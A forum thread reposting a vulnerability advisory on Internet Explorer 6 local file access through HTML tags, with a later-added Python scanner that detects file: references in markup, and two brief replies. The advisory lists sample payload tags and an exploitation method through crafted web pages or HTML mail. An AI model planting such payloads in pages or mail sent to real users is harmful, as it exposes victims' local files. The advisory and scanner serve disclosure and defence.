Thread: Microsoft Internet Explorer Local File Accesses Vulnerability

  1. #1
    Microsoft Internet Explorer Local File Accesses Vulnerability

    #####################################################################

    XDisclose Advisory : XD*000**
    Vulnerability Discovered : February *0th 07
    Advisory Released : February 20th 07
    ****** : Rajesh Sethumadhavan

    Class : Local File Accesses
    Solution Status : Unpatched
    Vendor : Microsoft Corporation
    Affected applications : Microsoft Internet Explorer
    Affected version : Microsoft Internet Explorer 6
    (Other versions may be also affected)
    Affected Platform : Windows XP Professional SP0,SP*,SP2
    Windows Home Edition SP0,SP*,SP2
    Windows 200*
    #####################################################################


    Overview:
    Microsoft Internet Explorer is a default browser bundled with all
    versions of Microsoft Windows operating system.

    Description:
    A vulnerability has been identified in Microsoft Internet Explorer (default installation) on Windows XP Service Pack 2 which could be exploited by malicious users to obtain victims' local files. This flaw is due to an error in the way Microsoft Internet Explorer handles different HTML tags, which could be exploited by a malicious remote user to obtain sensitive local files from the victim's computer.

    Vulnerability Insight :
    Microsoft Windows Explorer is not handling various HTML tags like "img" "script" "embed" "object" "param" "style" "bgsound" "body" "input" (other tags may also be vulnerable). By using the file protocol along with the above tags it is possible to access the victim's local files.

    a) Embed Tag Local file Accesses:
    ---------------------------------------------------------------------
    <EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=*440></EMBED>
    ---------------------------------------------------------------------

    b) Object & Param Tag Local File Accesses:
    ---------------------------------------------------------------------
    <object type="audio/x-mid" data="file:///C:/test.mid" width="200" height="20">
    <param name="src" value="file:///C:/test.mid">
    <param name="autoStart" value="true">
    <param name="autoStart" value="0">
    </object>
    ---------------------------------------------------------------------

    c) Body Tag Local File Accesses:
    ---------------------------------------------------------------------
    <body background="file:///C:/test.gif" onload="alert('loading body bgrd success')" onerror="alert('loading body bgrd error')">
    ---------------------------------------------------------------------

    d) Style Tag Local File Accesses:
    ---------------------------------------------------------------------
    <STYLE type="text/css">BODY{background:url("file:///C:/test.gif")}</STYLE>
    ---------------------------------------------------------------------

    e) Bgsound Tag Local File Accesses:
    ---------------------------------------------------------------------
    <bgsound src="file:///C:/test.mid" id="soundeffect" loop=* autostart="true"/>
    ---------------------------------------------------------------------

    f) Input Tag Local File Accesses:
    ---------------------------------------------------------------------
    <form>
    <input type="image" src="file:///C:/test.gif" onload="alert('loading input success')" onerror="alert('loading input error')">
    </form>
    ---------------------------------------------------------------------

    g) Image Tag Local File Accesses:
    ---------------------------------------------------------------------
    <img src="file:///C:/test.jpg" onload="alert('loading image success')"
    onerror="alert('loading image error')">
    ---------------------------------------------------------------------

    h) Script Tag Local File Accesses:
    ---------------------------------------------------------------------
    <script src="file:///C:/test.js"></script>
    ---------------------------------------------------------------------


    Exploitation method:
    - Create a web page or an HTML mail with the vulnerable code
    - When the victim opens the mail or visits the vulnerable site, it is possible to access his local files.

    Demonstration:
    Note: The demonstration will try to access a few default images and wave files

    - Visit the POC
    - If a vulnerable Internet Explorer is used, it will show your local
    sample images and give a proper alert.

    Solution:
    No solution

    Screenshot:
    http://www.xdisclose.com/images/xdiscloselocalie.jpg

    Proof Of Concept:
    http://www.xdisclose.com/poc/xdiscloselocalie.html

    Impact:
    A remote user can get access to the victim's local system files.

    Scope of impact is limited to system level.

    Original Advisory:
    http://www.xdisclose.com/XD*000**.txt

    Credits:
    Rajesh Sethumadhavan has been credited with the discovery of this vulnerability

    Disclaimer:
    This entire document is strictly for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your own risk. The exploit code is to be used in your testing environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
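
    For a mail gateway or web proxy that wants to flag the pattern this advisory describes, the following is an added example (not part of the original post or advisory) that scans markup for `file:` references in the resource-loading attributes and CSS `url()` values of the tags listed above. The names `FileRefScanner`, `scan_html` and the sample body are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that trigger a resource load on the tags the advisory lists.
URL_ATTRS = {"src", "data", "background", "value", "href"}
CSS_URL = re.compile(r"url\(\s*['\"]?\s*([^'\")]+)", re.I)

def is_file_url(value):
    # URL parsers drop leading whitespace and embedded tab/newline characters.
    cleaned = re.sub(r"[\t\r\n]", "", value or "").strip().lower()
    return cleaned.startswith("file:")

class FileRefScanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self._in_style = [], False

    def handle_starttag(self, tag, attrs):
        self._in_style = self._in_style or tag == "style"
        for name, value in attrs:
            if name in URL_ATTRS and is_file_url(value):
                self.findings.append((tag, name, value.strip()))
            elif name == "style":  # inline CSS can carry url(file:...) too
                self._scan_css(tag, value or "")

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:  # text inside a <style> element
            self._scan_css("style", data)

    def _scan_css(self, tag, css):
        for m in CSS_URL.finditer(css):
            if is_file_url(m.group(1)):
                self.findings.append((tag, "css-url", m.group(1).strip()))

def scan_html(html):
    # Returns (tag, attribute, url) for every file: reference in the markup.
    scanner = FileRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample body, modelled on the tag list in the advisory.
SAMPLE = """<body background="file:///C:/test.gif">
<style type="text/css">BODY{background:url(" file:///C:/test.gif")}</style>
<img src="http://example.com/logo.png">
<object data=" FILE:///C:/test.mid"><param name="src" value="file:///C:/test.mid"></object>
<p style="background:url(fi&#108;e:///C:/x.gif)">hello</p></body>"""
```

    Calling `scan_html(SAMPLE)` reports the body, style, object, param and inline-style references and ignores the `http:` image; a filter would quarantine or rewrite any message with a non-empty result.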

  2. #2
    DevilsAdvance Guest
    Another IE Exploit... What's your point?
    As long as it remains the vast majority web browser it will always be targeted and exploits exploited...

  3. #3
    Which is why us computer enthusiasts/hackers/whatever we wanna call ourselves use Firefox...
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx
